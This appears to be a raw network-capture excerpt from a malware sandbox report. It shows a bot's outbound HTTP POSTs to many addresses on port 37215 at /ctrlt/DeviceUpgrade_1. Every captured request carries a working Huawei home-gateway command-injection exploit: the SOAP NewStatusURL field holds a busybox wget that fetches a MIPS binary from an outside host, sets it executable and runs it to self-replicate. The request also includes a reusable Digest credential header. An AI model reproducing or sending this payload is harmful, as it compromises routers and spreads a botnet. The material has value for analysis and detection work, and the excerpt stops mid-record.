                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1658192.168.2.1342832197.169.176.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597573042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1659192.168.2.1345744197.32.223.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597615957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1660192.168.2.135239018.179.0.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597814083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1661192.168.2.134555641.93.97.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597841978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1662192.168.2.1336126197.169.52.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597872972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1663192.168.2.1346140197.31.232.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597872972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1664192.168.2.1359778197.64.91.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597898006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1665192.168.2.1336616186.32.1.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597917080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1666192.168.2.1356808197.180.180.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597940922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1667192.168.2.135193041.79.183.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597959995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
